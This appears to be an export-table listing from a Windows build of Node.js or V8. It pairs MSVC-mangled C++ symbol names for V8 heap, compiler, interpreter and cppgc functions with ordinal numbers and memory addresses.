                                                                                                                                                                                                                                    ?AddTranslationForOperand@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@PEAVInstructionOperand@234@VMachineType@34@@Z30950x14106b120
                                                                                                                                                                                                                                    ?AddTypeProfileSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ30960x1409a8ef0
                                                                                                                                                                                                                                    ?AddUInt64@Bignum@base@v8@@QEAAX_K@Z30970x141003a30
                                                                                                                                                                                                                                    ?AddUnresolved@Scope@internal@v8@@QEAAXPEAVVariableProxy@23@@Z30980x140c62950
                                                                                                                                                                                                                                    ?AddUseInterval@TopLevelLiveRange@compiler@internal@v8@@QEAAXVLifetimePosition@234@0PEAVZone@34@_N@Z30990x141107190
                                                                                                                                                                                                                                    ?AddUsePosition@TopLevelLiveRange@compiler@internal@v8@@QEAAXPEAVUsePosition@234@_N@Z31000x1411072c0
                                                                                                                                                                                                                                    ?AddWeakCallback@OldToNewRememberedSet@internal@cppgc@@QEAAXUWeakCallbackItem@MarkingWorklists@23@@Z31010x14050a500
                                                                                                                                                                                                                                    ?AddWrapperInfoForTesting@ProcessingScope@LocalEmbedderHeapTracer@internal@v8@@QEAAXU?$pair@PEAXPEAX@std@@@Z31020x140b3a8b0
                                                                                                                                                                                                                                    ?AddWriter@NativeModule@wasm@internal@v8@@QEAAXXZ31030x14053cf50
                                                                                                                                                                                                                                    ?AddWriter@WasmCodeAllocator@wasm@internal@v8@@QEAAXXZ31040x14065f400
                                                                                                                                                                                                                                    ?AddressUsesRegister@Operand@internal@v8@@QEBA_NVRegister@23@@Z31050x1405fddc0
                                                                                                                                                                                                                                    ?Addresses@StackTrace@debug@base@v8@@QEBAPEBQEBXPEA_K@Z31060x140fffd20
                                                                                                                                                                                                                                    ?AdjustAmountOfExternalAllocatedMemory@Isolate@v8@@QEAA_J_J@Z31070x140c78750
                                                                                                                                                                                                                                    ?AdjustRepresentation@OrderedHashMapHandler@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashMap@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedHashMap@internal@v8@@@23@@Z31080x1408f8490
                                                                                                                                                                                                                                    ?AdjustRepresentation@OrderedHashSetHandler@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashSet@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedHashSet@internal@v8@@@23@@Z31090x1408f8610
                                                                                                                                                                                                                                    ?AdjustRepresentation@OrderedNameDictionaryHandler@internal@v8@@KA?AV?$MaybeHandle@VOrderedNameDictionary@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedNameDictionary@internal@v8@@@23@@Z31100x1408f8730
                                                                                                                                                                                                                                    ?AdjustSamplingInterval@CpuProfiler@internal@v8@@AEAAXXZ31110x14087b030
                                                                                                                                                                                                                                    ?AdjustSchedulingParams@OS@base@v8@@SAXXZ31120x1400971a0
                                                                                                                                                                                                                                    ?AdjustStackLimitForSimulator@StackGuard@internal@v8@@QEAAXXZ31130x140b58300
                                                                                                                                                                                                                                    ?Advance@BytecodeArrayIterator@interpreter@internal@v8@@QEAAXXZ31140x14053cf90
                                                                                                                                                                                                                                    ?Advance@BytecodeOffsetIterator@baseline@internal@v8@@QEAAXXZ31150x14053cfc0
                                                                                                                                                                                                                                    ?Advance@FeedbackIterator@internal@v8@@QEAAXXZ31160x1409a8f30
                                                                                                                                                                                                                                    ?Advance@JavaScriptFrameIterator@internal@v8@@QEAAXXZ31170x140b7a070
                                                                                                                                                                                                                                    ?Advance@RelocIterator@internal@v8@@AEAAXH@Z31180x140559680
                                                                                                                                                                                                                                    ?Advance@SourcePositionTableIterator@internal@v8@@QEAAXXZ31190x140bdbe70
                                                                                                                                                                                                                                    ?Advance@StackFrameIterator@internal@v8@@QEAAXXZ31200x140b7a1e0
                                                                                                                                                                                                                                    ?Advance@StackTraceFrameIterator@internal@v8@@QEAAXXZ31210x140b7a2a0
                                                                                                                                                                                                                                    ?Advance@iterator@StateValuesAccess@compiler@internal@v8@@AEAAXXZ31220x1410dfba0
                                                                                                                                                                                                                                    ?AdvanceAllocationObservers@AllocationCounter@internal@v8@@QEAAX_K@Z31230x140b4a210
                                                                                                                                                                                                                                    ?AdvanceAllocationObservers@SpaceWithLinearArea@internal@v8@@QEAAXXZ31240x140a9bc60
                                                                                                                                                                                                                                    ?AdvanceAndInvokeAllocationObservers@LargeObjectSpace@internal@v8@@IEAAX_K0@Z31250x140af30e0
                                                                                                                                                                                                                                    ?AdvanceCurrentPosition@RegExpBytecodeGenerator@internal@v8@@UEAAXH@Z31260x140853b50
                                                                                                                                                                                                                                    ?AdvanceCurrentPosition@RegExpMacroAssemblerX64@internal@v8@@UEAAXH@Z31270x14056deb0
                                                                                                                                                                                                                                    ?AdvanceGetTag@RelocIterator@internal@v8@@AEAAHXZ31280x140bde550
                                                                                                                                                                                                                                    ?AdvanceLastProcessedMarker@LiveRange@compiler@internal@v8@@AEBAXPEAVUseInterval@234@VLifetimePosition@234@@Z31290x1411073b0
                                                                                                                                                                                                                                    ?AdvanceLocation@EhFrameWriter@internal@v8@@QEAAXH@Z31300x140b9b040
                                                                                                                                                                                                                                    ?AdvanceMarkingOnAllocation@MarkerBase@internal@cppgc@@IEAAXXZ31310x140513020
                                                                                                                                                                                                                                    ?AdvanceMarkingWithLimits@MarkerBase@internal@cppgc@@QEAA_NVTimeDelta@base@v8@@_K@Z31320x1405130a0
                                                                                                                                                                                                                                    ?AdvanceOnAllocation@IncrementalMarking@internal@v8@@AEAAXXZ31330x140af52b0
                                                                                                                                                                                                                                    ?AdvanceOneFrame@StackTraceFrameIterator@internal@v8@@QEAAXXZ31340x14053d0e0
                                                                                                                                                                                                                                    ?AdvancePolymorphic@FeedbackIterator@internal@v8@@AEAAXXZ31350x1409a9020
                                                                                                                                                                                                                                    ?AdvanceReadData@RelocIterator@internal@v8@@AEAAXXZ31360x140bde560
                                                                                                                                                                                                                                    ?AdvanceReadInt@RelocIterator@internal@v8@@AEAAXXZ31370x140bde5f0
                                                                                                                                                                                                                                    ?AdvanceReadLongPCJump@RelocIterator@internal@v8@@AEAAXXZ31380x140bde630
                                                                                                                                                                                                                                    ?AdvanceReadPC@RelocIterator@internal@v8@@AEAAXXZ31390x140bde680
                                                                                                                                                                                                                                    ?AdvanceRegister@RegExpBytecodeGenerator@internal@v8@@UEAAXHH@Z31400x140853be0
                                                                                                                                                                                                                                    ?AdvanceRegister@RegExpMacroAssemblerX64@internal@v8@@UEAAXHH@Z31410x14056def0
                                                                                                                                                                                                                                    ?AdvanceTillNotEmpty@iterator@StateValuesAccess@compiler@internal@v8@@QEAA_KXZ31420x1410dfbd0
                                                                                                                                                                                                                                    ?AdvanceToBytecodeOffset@BytecodeOffsetIterator@baseline@internal@v8@@QEAAXH@Z31430x14053d0f0
                                                                                                                                                                                                                                    ?AdvanceToNextPage@PagedSpaceObjectIterator@internal@v8@@AEAA_NXZ31440x140aac500
                                                                                                                                                                                                                                    ?AdvanceToPCOffset@BytecodeOffsetIterator@baseline@internal@v8@@QEAAX_K@Z31450x14053d1e0
                                                                                                                                                                                                                                    ?AdvanceTracing@CppHeap@internal@v8@@QEAA_NN@Z31460x140b3e7f0
                                                                                                                                                                                                                                    ?AdvanceWithDeadline@IncrementalMarking@internal@v8@@QEAA?AW4StepResult@23@NW4CompletionAction@123@W4StepOrigin@23@@Z31470x140af56f0
                                                                                                                                                                                                                                    ?AggregateError_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ31480x14053d2d0
                                                                                                                                                                                                                                    ?AggregateError_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ31490x1407df290
                                                                                                                                                                                                                                    ?Align@AlignedSlotAllocator@internal@v8@@QEAAHH@Z31500x140c0f760
                                                                                                                                                                                                                                    ?Align@Assembler@internal@v8@@QEAAXH@Z31510x1405fde40
                                                                                                                                                                                                                                    ?Align@Bignum@base@v8@@AEAAXAEBV123@@Z31520x141003aa0
                                                                                                                                                                                                                                    ?AlignFrame@Frame@compiler@internal@v8@@QEAAXH@Z31530x141069350
                                                                                                                                                                                                                                    ?AlignSavedCalleeRegisterSlots@Frame@compiler@internal@v8@@QEAAXH@Z31540x14057e710
                                                                                                                                                                                                                                    ?AlignedAlloc@internal@v8@@YAPEAX_K0@Z31550x1407bc6f0
                                                                                                                                                                                                                                    ?AlignedFree@internal@v8@@YAXPEAX@Z31560x1407bc780
                                                                                                                                                                                                                                    ?AlignmentRequirements@InstructionSelector@compiler@internal@v8@@SA?AV0MachineOperatorBuilder@234@XZ31570x140584970
                                                                                                                                                                                                                                    ?AllBitsClearInRange@?$ConcurrentBitmap@$00@internal@v8@@QEAA_NII@Z31580x140abe120
                                                                                                                                                                                                                                    ?AllBitsSetInRange@?$ConcurrentBitmap@$00@internal@v8@@QEAA_NII@Z31590x140abe1b0
                                                                                                                                                                                                                                    ?AllFramesOnStackAreBlackboxed@Debug@internal@v8@@QEAA_NXZ31600x140bb71a0
                                                                                                                                                                                                                                    ?AllInRangeOrTopBitSet@SimdSwizzle@wasm@internal@v8@@SA_NV?$array@E$0BA@@std@@@Z31610x140669e30
                                                                                                                                                                                                                                    ?AllValueInputsAreTyped@NodeProperties@compiler@internal@v8@@SA_NPEAVNode@234@@Z31620x141033cf0
                                                                                                                                                                                                                                    ?AllocatableMemoryInCodePage@MemoryChunkLayout@internal@v8@@SA_KXZ31630x140abc390
                                                                                                                                                                                                                                    ?AllocatableMemoryInDataPage@MemoryChunkLayout@internal@v8@@SA_KXZ31640x140abc3d0
                                                                                                                                                                                                                                    ?AllocatableMemoryInMemoryChunk@MemoryChunkLayout@internal@v8@@SA_KW4AllocationSpace@23@@Z31650x140abc3f0
                                                                                                                                                                                                                                    ?AllocatableRegisters@CallDescriptor@compiler@internal@v8@@QEBA?AV?$RegListBase@VRegister@internal@v8@@@34@XZ31660x14057e740
                                                                                                                                                                                                                                    ?Allocate@?$Deserializer@VIsolate@internal@v8@@@internal@v8@@AEAA?AVHeapObject@23@W4AllocationType@23@HW4AllocationAlignment@23@@Z31670x1407e98c0
                                                                                                                                                                                                                                    ?Allocate@?$Deserializer@VLocalIsolate@internal@v8@@@internal@v8@@AEAA?AVHeapObject@23@W4AllocationType@23@HW4AllocationAlignment@23@@Z31680x1407e9900
                                                                                                                                                                                                                                    ?Allocate@?$OrderedHashTableHandler@VSmallOrderedHashMap@internal@v8@@VOrderedHashMap@23@@internal@v8@@SA?AV?$MaybeHandle@VHeapObject@internal@v8@@@23@PEAVIsolate@23@H@Z31690x1408f88e0
                                                                                                                                                                                                                                    ?Allocate@?$OrderedHashTableHandler@VSmallOrderedHashSet@internal@v8@@VOrderedHashSet@23@@internal@v8@@SA?AV?$MaybeHandle@VHeapObject@internal@v8@@@23@PEAVIsolate@23@H@Z31700x1408f8940
                                                                                                                                                                                                                                    ?Allocate@?$OrderedHashTableHandler@VSmallOrderedNameDictionary@internal@v8@@VOrderedNameDictionary@23@@internal@v8@@SA?AV?$MaybeHandle@VHeapObject@internal@v8@@@23@PEAVIsolate@23@H@Z31710x1408f89a0
                                                                                                                                                                                                                                    ?Allocate@AddressSpaceReservation@base@v8@@QEAA_NPEAX_KW4MemoryPermission@OS@23@@Z31720x140ff3350
                                                                                                                                                                                                                                    ?Allocate@AlignedSlotAllocator@internal@v8@@QEAAHH@Z31730x140c0f790
                                                                                                                                                                                                                                    ?Allocate@BackingStore@internal@v8@@SA?AV?$unique_ptr@VBackingStore@internal@v8@@U?$default_delete@VBackingStore@internal@v8@@@std@@@std@@PEAVIsolate@23@_KW4SharedFlag@23@W4InitializedFlag@23@@Z31740x140a06140
                                                                                                                                                                                                                                    ?Allocate@DisjointAllocationPool@wasm@internal@v8@@QEAA?AVAddressRegion@base@4@_K@Z31750x14065f410
                                                                                                                                                                                                                                    ?Allocate@FreeList@internal@cppgc@@QEAA?AUBlock@123@_K@Z31760x14051ca50
                                                                                                                                                                                                                                    ?Allocate@FreeListMany@internal@v8@@UEAA?AVFreeSpace@23@_KPEA_KW4AllocationOrigin@23@@Z31770x140b1ed70
                                                                                                                                                                                                                                    ?Allocate@FreeListManyCached@internal@v8@@UEAA?AVFreeSpace@23@_KPEA_KW4AllocationOrigin@23@@Z31780x140b1eeb0
                                                                                                                                                                                                                                    ?Allocate@FreeListManyCachedFastPath@internal@v8@@UEAA?AVFreeSpace@23@_KPEA_KW4AllocationOrigin@23@@Z31790x140b1f030
                                                                                                                                                                                                                                    ?Allocate@FreeListManyCachedOrigin@internal@v8@@UEAA?AVFreeSpace@23@_KPEA_KW4AllocationOrigin@23@@Z31800x140b1f310
                                                                                                                                                                                                                                    ?Allocate@Isolate@internal@v8@@CAPEAV123@_N@Z31810x140b644d0
                                                                                                                                                                                                                                    ?Allocate@Isolate@v8@@SAPEAV12@XZ31820x140c78820
                                                                                                                                                                                                                                    ?Allocate@JSGraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@W4AllocationType@34@PEAV5234@@Z31830x1410e13f0
                                                                                                                                                                                                                                    ?Allocate@MakeGarbageCollectedTraitInternal@internal@cppgc@@CAPEAXAEAVAllocationHandle@3@_KG@Z31840x14051ffb0
                                                                                                                                                                                                                                    ?Allocate@MakeGarbageCollectedTraitInternal@internal@cppgc@@CAPEAXAEAVAllocationHandle@3@_KGUCustomSpaceIndex@3@@Z31850x140520000
                                                                                                                                                                                                                                    ?Allocate@MakeGarbageCollectedTraitInternal@internal@cppgc@@CAPEAXAEAVAllocationHandle@3@_KW4AlignVal@23@G@Z31860x140520030
                                                                                                                                                                                                                                    ?Allocate@MakeGarbageCollectedTraitInternal@internal@cppgc@@CAPEAXAEAVAllocationHandle@3@_KW4AlignVal@23@GUCustomSpaceIndex@3@@Z31870x140520090
                                                                                                                                                                                                                                    ?Allocate@NormalPageMemoryRegion@internal@cppgc@@QEAAXPEAE@Z31880x14050d470
                                                                                                                                                                                                                                    ?Allocate@OS@base@v8@@CAPEAXPEAX_K1W4MemoryPermission@123@@Z31890x140ff33e0
                                                                                                                                                                                                                                    ?Allocate@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@VType@234@W4AllocationType@34@@Z31900x1410d4c50
                                                                                                                                                                                                                                    ?AllocateAlignedRegion@RegionAllocator@base@v8@@QEAA_K_K0@Z31910x1410005c0
                                                                                                                                                                                                                                    ?AllocateAndInstallRequestedHeapObjects@Assembler@internal@v8@@AEAAXPEAVIsolate@23@@Z31920x1405fde60
                                                                                                                                                                                                                                    ?AllocateCode@CodeBuilder@Factory@internal@v8@@AEAA?AV?$MaybeHandle@VCode@internal@v8@@@34@_N@Z31930x140b20530
                                                                                                                                                                                                                                    ?AllocateConcurrentSparkplugCode@CodeBuilder@Factory@internal@v8@@AEAA?AV?$MaybeHandle@VCode@internal@v8@@@34@_N@Z31940x140b20680
                                                                                                                                                                                                                                    ?AllocateData@ControlEquivalence@compiler@internal@v8@@AEAAXPEAVNode@234@@Z31950x1411d5ae0
                                                                                                                                                                                                                                    ?AllocateDeferredConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KXZ31960x140a59120
                                                                                                                                                                                                                                    ?AllocateElements@JSCreateLowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@0W4ElementsKind@34@AEBV?$vector@PEAVNode@compiler@internal@v8@@V?$allocator@PEAVNode@compiler@internal@v8@@@std@@@std@@W4AllocationType@34@@Z31970x141186d20
                                                                                                                                                                                                                                    ?AllocateElements@JSCreateLowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@0W4ElementsKind@34@HW4AllocationType@34@@Z31980x141186ff0
                                                                                                                                                                                                                                    ?AllocateEmpty@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@KA?AV?$MaybeHandle@VOrderedHashMap@internal@v8@@@23@PEAVIsolate@23@W4AllocationType@23@W4RootIndex@23@@Z31990x1408f8a10
                                                                                                                                                                                                                                    ?AllocateEmpty@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@KA?AV?$MaybeHandle@VOrderedHashSet@internal@v8@@@23@PEAVIsolate@23@W4AllocationType@23@W4RootIndex@23@@Z32000x1408f8a70
                                                                                                                                                                                                                                    ?AllocateEmpty@?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@KA?AV?$MaybeHandle@VOrderedNameDictionary@internal@v8@@@23@PEAVIsolate@23@W4AllocationType@23@W4RootIndex@23@@Z32010x1408f8ad0
                                                                                                                                                                                                                                    ?AllocateEmpty@OrderedHashMap@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashMap@internal@v8@@@23@PEAVIsolate@23@W4AllocationType@23@@Z32020x1408f8a10
                                                                                                                                                                                                                                    ?AllocateEmpty@OrderedHashSet@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashSet@internal@v8@@@23@PEAVIsolate@23@W4AllocationType@23@@Z32030x1408f8a70
                                                                                                                                                                                                                                    ?AllocateEmpty@OrderedNameDictionary@internal@v8@@SA?AV?$MaybeHandle@VOrderedNameDictionary@internal@v8@@@23@PEAVIsolate@23@W4AllocationType@23@@Z32040x1408f8b30
                                                                                                                                                                                                                                    ?AllocateEntry@V8HeapExplorer@internal@v8@@UEAAPEAVHeapEntry@23@PEAX@Z32050x14086bd70
                                                                                                                                                                                                                                    ?AllocateEntry@V8HeapExplorer@internal@v8@@UEAAPEAVHeapEntry@23@VSmi@23@@Z32060x14086bd80
                                                                                                                                                                                                                                    ?AllocateEnvironmentThreadId@node@@YA?AUThreadId@1@XZ32070x14029d8b0
                                                                                                                                                                                                                                    ?AllocateExternalBackingStore@Heap@internal@v8@@QEAAPEAXAEBV?$function@$$A6APEAX_K@Z@std@@_K@Z32080x140aff040
                                                                                                                                                                                                                                    ?AllocateForDeserializedCode@NativeModule@wasm@internal@v8@@QEAA?AU?$pair@V?$Vector@E@base@v8@@UJumpTablesRef@NativeModule@wasm@internal@3@@std@@_K@Z32090x14065f980
                                                                                                                                                                                                                                    ?AllocateGuardRegion@VirtualAddressSpace@base@v8@@UEAA_N_K0@Z32100x140ffc030
                                                                                                                                                                                                                                    ?AllocateGuardRegion@VirtualAddressSubspace@base@v8@@UEAA_N_K0@Z32110x140ffc090
                                                                                                                                                                                                                                    ?AllocateHeapSlot@Scope@internal@v8@@AEAAXPEAVVariable@23@@Z32120x140c62ad0
                                                                                                                                                                                                                                    ?AllocateInLabSlow@ConcurrentAllocator@internal@v8@@AEAA?AVAllocationResult@23@HW4AllocationAlignment@23@W4AllocationOrigin@23@@Z32130x140b46dd0
                                                                                                                                                                                                                                    ?AllocateInOldGenerationStubConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ32140x1410de850
                                                                                                                                                                                                                                    ?AllocateInOldGenerationStubConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VCode@internal@v8@@@34@XZ32150x1410e1490
                                                                                                                                                                                                                                    ?AllocateInRegion@DisjointAllocationPool@wasm@internal@v8@@QEAA?AVAddressRegion@base@4@_KV564@@Z32160x14065fa30
                                                                                                                                                                                                                                    ?AllocateInYoungGenerationStubConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ32170x1410de8a0
                                                                                                                                                                                                                                    ?AllocateInYoungGenerationStubConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VCode@internal@v8@@@34@XZ32180x1410e14e0
                                                                                                                                                                                                                                    ?AllocateIndex@ConstantArrayBuilder@interpreter@internal@v8@@AEAAIVEntry@1234@@Z32190x140a34db0
                                                                                                                                                                                                                                    ?AllocateIndexArray@ConstantArrayBuilder@interpreter@internal@v8@@AEAAIVEntry@1234@_K@Z32200x140a34e20
                                                                                                                                                                                                                                    ?AllocateJumpTable@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAPEAVBytecodeJumpTable@234@HH@Z32210x140a59130
                                                                                                                                                                                                                                    ?AllocateLargePage@LargeObjectSpace@internal@v8@@IEAAPEAVLargePage@23@HW4Executability@23@@Z32220x140af3160
                                                                                                                                                                                                                                    ?AllocateLargePage@MemoryAllocator@internal@v8@@QEAAPEAVLargePage@23@PEAVLargeObjectSpace@23@_KW4Executability@23@@Z32230x140abc9d0
                                                                                                                                                                                                                                    ?AllocateLargePageMemory@PageBackend@internal@cppgc@@QEAAPEAE_K@Z32240x14050d4e0
                                                                                                                                                                                                                                    ?AllocateLiteralRegExp@JSCreateLowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@0VRegExpBoilerplateDescriptionRef@234@@Z32250x1411872a0
                                                                                                                                                                                                                                    ?AllocateLocals@DeclarationScope@internal@v8@@QEAAXXZ32260x140c62b00
                                                                                                                                                                                                                                    ?AllocateNode@CrossThreadPersistentRegion@internal@cppgc@@QEAAPEAVPersistentNode@23@PEAXP6AXPEAVVisitor@3@PEBX@Z@Z32270x14053d2e0
                                                                                                                                                                                                                                    ?AllocateNode@PersistentRegion@internal@cppgc@@QEAAPEAVPersistentNode@23@PEAXP6AXPEAVVisitor@3@PEBX@Z@Z32280x14053d350
                                                                                                                                                                                                                                    ?AllocateNonParameterLocal@Scope@internal@v8@@AEAAXPEAVVariable@23@@Z32290x140c62da0
                                                                                                                                                                                                                                    ?AllocateNonParameterLocalsAndDeclaredGlobals@Scope@internal@v8@@AEAAXXZ32300x140c62e40
                                                                                                                                                                                                                                    ?AllocateNormalPageMemory@PageBackend@internal@cppgc@@QEAAPEAE_K@Z32310x14050d620
                                                                                                                                                                                                                                    ?AllocateObject@ObjectAllocator@internal@cppgc@@QEAAPEAX_KG@Z32320x14051ffb0
                                                                                                                                                                                                                                    ?AllocateObject@ObjectAllocator@internal@cppgc@@QEAAPEAX_KGUCustomSpaceIndex@3@@Z32330x140520000
                                                                                                                                                                                                                                    ?AllocateObject@ObjectAllocator@internal@cppgc@@QEAAPEAX_KW4AlignVal@23@G@Z32340x140520030
                                                                                                                                                                                                                                    ?AllocateObject@ObjectAllocator@internal@cppgc@@QEAAPEAX_KW4AlignVal@23@GUCustomSpaceIndex@3@@Z32350x140520090
                                                                                                                                                                                                                                    ?AllocateObjectOnSpace@ObjectAllocator@internal@cppgc@@AEAAPEAXAEAVNormalPageSpace@23@_KG@Z32360x14050e210
                                                                                                                                                                                                                                    ?AllocateObjectOnSpace@ObjectAllocator@internal@cppgc@@AEAAPEAXAEAVNormalPageSpace@23@_KW4AlignVal@23@G@Z32370x14050e2b0
                                                                                                                                                                                                                                    ?AllocateOnHeap@Type@compiler@internal@v8@@QEAA?AV?$Handle@VTurbofanType@internal@v8@@@34@PEAVFactory@34@@Z32380x141027320
                                                                                                                                                                                                                                    ?AllocateOutsideLab@ConcurrentAllocator@internal@v8@@AEAA?AVAllocationResult@23@HW4AllocationAlignment@23@W4AllocationOrigin@23@@Z32390x140b46f90
                                                                                                                                                                                                                                    ?AllocatePage@MemoryAllocator@internal@v8@@QEAAPEAVPage@23@W4AllocationMode@123@PEAVSpace@23@W4Executability@23@@Z32400x140abcad0
                                                                                                                                                                                                                                    ?AllocatePageSize@BoundedPageAllocator@base@v8@@UEAA_KXZ32410x140097b70
                                                                                                                                                                                                                                    ?AllocatePageSize@OS@base@v8@@CA_KXZ32420x140ff35d0
                                                                                                                                                                                                                                    ?AllocatePageSize@PageAllocator@base@v8@@UEAA_KXZ32430x1400978d0
                                                                                                                                                                                                                                    ?AllocatePageSize@internal@v8@@YA_KXZ32440x1407bc810
                                                                                                                                                                                                                                    ?AllocatePages@BoundedPageAllocator@base@v8@@UEAAPEAXPEAX_K1W4Permission@PageAllocator@3@@Z32450x140ffb790
                                                                                                                                                                                                                                    ?AllocatePages@PageAllocator@base@v8@@UEAAPEAXPEAX_K1W4Permission@13@@Z32460x140ff6370
                                                                                                                                                                                                                                    ?AllocatePages@VirtualAddressSpace@base@v8@@UEAA_K_K00W4PagePermissions@3@@Z32470x140ffc100
                                                                                                                                                                                                                                    ?AllocatePages@VirtualAddressSubspace@base@v8@@UEAA_K_K00W4PagePermissions@3@@Z32480x140ffc120
                                                                                                                                                                                                                                    ?AllocatePages@internal@v8@@YAPEAXPEAVPageAllocator@2@PEAX_K2W4Permission@32@@Z32490x1407bc830
                                                                                                                                                                                                                                    ?AllocatePagesAt@BoundedPageAllocator@base@v8@@QEAA_N_K0W4Permission@PageAllocator@3@@Z32500x140ffb8a0
                                                                                                                                                                                                                                    ?AllocateParameter@DeclarationScope@internal@v8@@AEAAXPEAVVariable@23@H@Z32510x140c63030
                                                                                                                                                                                                                                    ?AllocateParameterLocals@DeclarationScope@internal@v8@@QEAAXXZ32520x140c63110
                                                                                                                                                                                                                                    ?AllocateRaw@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@AEAA?AVHeapObject@23@HW4AllocationType@23@W4AllocationAlignment@23@@Z32530x140b34080
                                                                                                                                                                                                                                    ?AllocateRaw@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@AEAA?AVHeapObject@23@HW4AllocationType@23@W4AllocationAlignment@23@@Z32540x140b340a0
                                                                                                                                                                                                                                    ?AllocateRaw@CodeLargeObjectSpace@internal@v8@@QEAA?AVAllocationResult@23@H@Z32550x140af3210
                                                                                                                                                                                                                                    ?AllocateRaw@Factory@internal@v8@@AEAA?AVHeapObject@23@HW4AllocationType@23@W4AllocationAlignment@23@@Z32560x140b20790
                                                                                                                                                                                                                                    ?AllocateRaw@HeapAllocator@internal@v8@@QEAA?AVAllocationResult@23@HW4AllocationType@23@W4AllocationOrigin@23@W4AllocationAlignment@23@@Z32570x14053d4a0
                                                                                                                                                                                                                                    ?AllocateRaw@LocalFactory@internal@v8@@AEAA?AVHeapObject@23@HW4AllocationType@23@W4AllocationAlignment@23@@Z32580x140af2a10
                                                                                                                                                                                                                                    ?AllocateRaw@LocalHeap@internal@v8@@QEAA?AVAllocationResult@23@HW4AllocationType@23@W4AllocationOrigin@23@W4AllocationAlignment@23@@Z32590x1407e9940
                                                                                                                                                                                                                                    ?AllocateRaw@NewLargeObjectSpace@internal@v8@@QEAA?AVAllocationResult@23@H@Z32600x140af3230
                                                                                                                                                                                                                                    ?AllocateRaw@OldLargeObjectSpace@internal@v8@@QEAA?AVAllocationResult@23@H@Z32610x140af35d0
                                                                                                                                                                                                                                    ?AllocateRaw@ReadOnlySpace@internal@v8@@QEAA?AVAllocationResult@23@HW4AllocationAlignment@23@@Z32620x140aaa150
                                                                                                                                                                                                                                    ?AllocateRaw@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@VType@234@W4AllocationType@34@W4AllowLargeObjects@34@@Z32630x1410d4d10
                                                                                                                                                                                                                                    ?AllocateRawArray@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@@Z32640x140b340c0
                                                                                                                                                                                                                                    ?AllocateRawArray@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@@Z32650x140b34140
                                                                                                                                                                                                                                    ?AllocateRawBackground@CodeLargeObjectSpace@internal@v8@@QEAA?AVAllocationResult@23@PEAVLocalHeap@23@H@Z32660x140af35f0
                                                                                                                                                                                                                                    ?AllocateRawBackground@OldLargeObjectSpace@internal@v8@@QEAA?AVAllocationResult@23@PEAVLocalHeap@23@H@Z32670x140af3800
                                                                                                                                                                                                                                    ?AllocateRawData@HeapAllocator@internal@v8@@QEAA?AVAllocationResult@23@HW4AllocationType@23@W4AllocationOrigin@23@W4AllocationAlignment@23@@Z32680x14053dcb0
                                                                                                                                                                                                                                    ?AllocateRawFixedArray@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@@Z32690x140b341c0
                                                                                                                                                                                                                                    ?AllocateRawFixedArray@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@@Z32700x140b34200
                                                                                                                                                                                                                                    ?AllocateRawLargeInternal@HeapAllocator@internal@v8@@AEAA?AVAllocationResult@23@HW4AllocationType@23@W4AllocationOrigin@23@W4AllocationAlignment@23@@Z32710x140b17000
                                                                                                                                                                                                                                    ?AllocateRawOneByteInternalizedString@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VSeqOneByteString@internal@v8@@@23@HI@Z32720x140b34240
                                                                                                                                                                                                                                    ?AllocateRawOneByteInternalizedString@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VSeqOneByteString@internal@v8@@@23@HI@Z32730x140b34340
                                                                                                                                                                                                                                    ?AllocateRawOrFail@LocalHeap@internal@v8@@QEAA_KHW4AllocationType@23@W4AllocationOrigin@23@W4AllocationAlignment@23@@Z32740x1407e9d80
                                                                                                                                                                                                                                    ?AllocateRawSynchronized@NewSpace@internal@v8@@QEAA?AVAllocationResult@23@HW4AllocationAlignment@23@W4AllocationOrigin@23@@Z32750x14053e000
                                                                                                                                                                                                                                    ?AllocateRawTwoByteInternalizedString@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VSeqTwoByteString@internal@v8@@@23@HI@Z32760x140b34430
                                                                                                                                                                                                                                    ?AllocateRawTwoByteInternalizedString@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VSeqTwoByteString@internal@v8@@@23@HI@Z32770x140b34520
                                                                                                                                                                                                                                    ?AllocateRawWeakArrayList@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@@Z32780x140b34610
